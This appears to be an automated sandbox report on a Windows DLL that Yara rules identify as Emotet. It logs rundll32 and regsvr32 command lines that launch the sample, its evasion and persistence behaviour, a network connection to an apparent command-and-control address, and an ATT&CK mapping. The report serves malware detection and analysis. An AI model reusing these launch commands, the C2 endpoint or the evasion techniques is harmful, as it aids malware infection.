Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018001D950	6_2_000000018001D950
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180013150	6_2_0000000180013150
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018001ED50	6_2_000000018001ED50
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018001E960	6_2_000000018001E960
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180019D60	6_2_0000000180019D60
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018001C964	6_2_000000018001C964
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018001C568	6_2_000000018001C568
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180001D68	6_2_0000000180001D68
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180002D70	6_2_0000000180002D70
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180024574	6_2_0000000180024574
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180002178	6_2_0000000180002178
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180024D80	6_2_0000000180024D80
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180018598	6_2_0000000180018598
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180003598	6_2_0000000180003598
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018001F1A4	6_2_000000018001F1A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018002A9A8	6_2_000000018002A9A8
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00000001800119A8	6_2_00000001800119A8
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180025DAC	6_2_0000000180025DAC
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180018DAC	6_2_0000000180018DAC
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00000001800269B0	6_2_00000001800269B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00000001800059B8	6_2_00000001800059B8
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00000001800029BC	6_2_00000001800029BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00000001800141C0	6_2_00000001800141C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00000001800125C4	6_2_00000001800125C4
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00000001800121CC	6_2_00000001800121CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018000BDD0	6_2_000000018000BDD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00000001800075D4	6_2_00000001800075D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00000001800095DC	6_2_00000001800095DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018000F9E8	6_2_000000018000F9E8
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180002610	6_2_0000000180002610
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180019618	6_2_0000000180019618
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018001FA38	6_2_000000018001FA38
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018000A270	6_2_000000018000A270
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180019E78	6_2_0000000180019E78
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018001DA80	6_2_000000018001DA80
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180024698	6_2_0000000180024698
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00000001800176B8	6_2_00000001800176B8
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018002CAD0	6_2_000000018002CAD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180011AD0	6_2_0000000180011AD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180008AD8	6_2_0000000180008AD8
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00000001800296EC	6_2_00000001800296EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018000A6EC	6_2_000000018000A6EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180019300	6_2_0000000180019300
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018001BB04	6_2_000000018001BB04
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018002870C	6_2_000000018002870C
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018000131C	6_2_000000018000131C
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018000671C	6_2_000000018000671C
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180029B28	6_2_0000000180029B28
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180012F28	6_2_0000000180012F28
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018000BB28	6_2_000000018000BB28
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018001EB30	6_2_000000018001EB30
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180020334	6_2_0000000180020334
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180010758	6_2_0000000180010758
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_000000018001435C	6_2_000000018001435C
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180009F5C	6_2_0000000180009F5C
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180029368	6_2_0000000180029368
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180020768	6_2_0000000180020768
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180017378	6_2_0000000180017378

Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll	Jump to behavior

Source: auExrOTnvB.dll

Virustotal: Detection: 32%

Source: auExrOTnvB.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\auExrOTnvB.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\auExrOTnvB.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\auExrOTnvB.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\auExrOTnvB.dll,DllUnregisterServer
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PlUoNfxsJl\nlEiWRnuQfGg.dll"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\auExrOTnvB.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\auExrOTnvB.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\auExrOTnvB.dll,DllUnregisterServer	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PlUoNfxsJl\nlEiWRnuQfGg.dll"	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal80.troj.evad.winDLL@20/2@0/2

Source: C:\Windows\System32\regsvr32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 6_2_00000001800046A8 CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,FindCloseChangeNotification,

6_2_00000001800046A8

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: auExrOTnvB.dll

Static PE information: Image base 0x180000000 > 0x60000000

Source: auExrOTnvB.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: msacm32.pdb source: regsvr32.exe, 00000006.00000002.874999274.0000000000B95000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000006.00000002.874999274.0000000000B95000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001AFFD push ebp; retf	2_2_000000018001AFFE
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800051D1 push ebp; iretd	2_2_00000001800051D2
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001BA32 push ebp; retf	2_2_000000018001BA33
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180004E83 push es; ret	2_2_0000000180004E84
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001B694 push es; ret	2_2_000000018001B6E9
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001BADD push ebp; iretd	2_2_000000018001BADE
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001B717 push ebp; iretd	2_2_000000018001B718
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001AF4E push ebp; retf	2_2_000000018001AF4F
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800253BC pushfd ; retn 0057h	2_2_00000001800253BD
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001AFFD push ebp; retf	3_2_000000018001AFFE
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800051D1 push ebp; iretd	3_2_00000001800051D2
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001BA32 push ebp; retf	3_2_000000018001BA33
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180004E83 push es; ret	3_2_0000000180004E84
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001B694 push es; ret	3_2_000000018001B6E9
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001BADD push ebp; iretd	3_2_000000018001BADE
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001B717 push ebp; iretd	3_2_000000018001B718
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180007B3F push esp; retf	3_2_0000000180007B40
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001AF4E push ebp; retf	3_2_000000018001AF4F
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001AFFD push ebp; retf	4_2_000000018001AFFE
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000001800051D1 push ebp; iretd	4_2_00000001800051D2
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001BA32 push ebp; retf	4_2_000000018001BA33
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180004E83 push es; ret	4_2_0000000180004E84
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001B694 push es; ret	4_2_000000018001B6E9
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001BADD push ebp; iretd	4_2_000000018001BADE
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001B717 push ebp; iretd	4_2_000000018001B718
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180007B3F push esp; retf	4_2_0000000180007B40
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001AF4E push ebp; retf	4_2_000000018001AF4F
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00000001800051D1 push ebp; iretd	6_2_00000001800051D2
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180004E83 push es; ret	6_2_0000000180004E84
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_0000000180007B3F push esp; retf	6_2_0000000180007B40

Source: C:\Windows\System32\regsvr32.exe

Code function: 2_2_00007FF8CB7ED0B8 LoadLibraryA,GetProcAddress,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

2_2_00007FF8CB7ED0B8

Source: auExrOTnvB.dll

Static PE information: real checksum: 0x85ab6 should be: 0x89f29

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\auExrOTnvB.dll

Source: C:\Windows\System32\regsvr32.exe

PE file moved: C:\Windows\System32\PlUoNfxsJl\nlEiWRnuQfGg.dll

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Windows\system32\PlUoNfxsJl\nlEiWRnuQfGg.dll:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\system32\EiLKluGQrjcIDesH\cdSDOMrZ.dll:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\system32\LHxuzYLTL\VLSvNJxjRqmujry.dll:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\System32\svchost.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 1924	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6416	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5652	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_2-10052

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 6_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,

6_2_000000018000D26C

Source: C:\Windows\System32\regsvr32.exe

API call chain: ExitProcess graph end node

graph_2-10054

Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: svchost.exe, 00000018.00000002.875726076.000002259CE29000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`rF
Source: svchost.exe, 0000001C.00000002.876778996.0000019617A0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: svchost.exe, 0000001C.00000002.876860604.0000019617A54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware7,1\|
Source: regsvr32.exe, 00000006.00000002.875809902.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.436169934.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.436315168.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.436258983.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.589025244.000001E810CEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.588782166.000001E810C79000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.876513860.00000225A2456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.876538284.00000225A2463000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.875829919.0000019616ACB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.875457125.0000019616A63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000C.00000002.875170470.000001AD4E202000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 0000001C.00000002.876778996.0000019617A0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, l'
Source: regsvr32.exe, 00000006.00000003.436169934.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.875757017.0000000000F03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000001C.00000002.876778996.0000019617A0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021
Source: svchost.exe, 00000014.00000002.589012740.000001E810CE2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWog.mp.microsoft.com
Source: svchost.exe, 0000000C.00000002.875288748.000001AD4E228000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\regsvr32.exe

Code function: 2_2_00007FF8CB7E20E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_00007FF8CB7E20E0

Source: C:\Windows\System32\regsvr32.exe

2_2_00007FF8CB7ED0B8

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll64.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00007FF8CB7E20E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FF8CB7E20E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00007FF8CB7ED318 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF8CB7ED318
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00007FF8CB7E6550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FF8CB7E6550

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe

Network Connect: 23.239.0.12 443

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Code function: EnumSystemLocalesA,	2_2_00007FF8CB7EC8C8
Source: C:\Windows\System32\regsvr32.exe	Code function: EnumSystemLocalesA,	2_2_00007FF8CB7EC834
Source: C:\Windows\System32\regsvr32.exe	Code function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,	2_2_00007FF8CB7EC450
Source: C:\Windows\System32\regsvr32.exe	Code function: GetLocaleInfoA,	2_2_00007FF8CB7EC39C
Source: C:\Windows\System32\regsvr32.exe	Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA,	2_2_00007FF8CB7EDF98
Source: C:\Windows\System32\regsvr32.exe	Code function: EnumSystemLocalesA,	2_2_00007FF8CB7EC7F4
Source: C:\Windows\System32\regsvr32.exe	Code function: GetLocaleInfoW,	2_2_00007FF8CB7EDF20
Source: C:\Windows\System32\regsvr32.exe	Code function: GetLocaleInfoW,	2_2_00007FF8CB7EDF3C
Source: C:\Windows\System32\regsvr32.exe	Code function: _getptd,GetLocaleInfoA,	2_2_00007FF8CB7EC2B4
Source: C:\Windows\System32\regsvr32.exe	Code function: _getptd,GetLocaleInfoA,	2_2_00007FF8CB7EC6E4
Source: C:\Windows\System32\regsvr32.exe	Code function: GetLocaleInfoA,	2_2_00007FF8CB7EE1E8
Source: C:\Windows\System32\regsvr32.exe	Code function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,	2_2_00007FF8CB7EC934
Source: C:\Windows\System32\regsvr32.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	2_2_00007FF8CB7EC16C

Source: C:\Windows\System32\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 2_2_00007FF8CB7E4558 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

2_2_00007FF8CB7E4558

Source: C:\Windows\System32\regsvr32.exe

Code function: 2_2_00007FF8CB7EE6C0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

2_2_00007FF8CB7EE6C0

Source: svchost.exe, 0000001C.00000002.876694412.00000196173EF000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match	File source: 2.2.regsvr32.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2135e670000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.237001b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2135e670000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.237001b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.e70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.e70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.365208101.00000237001B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.365205750.000002135E670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.875184317.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367002552.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.876067804.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Native API	1 DLL Side-Loading	111 Process Injection	2 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
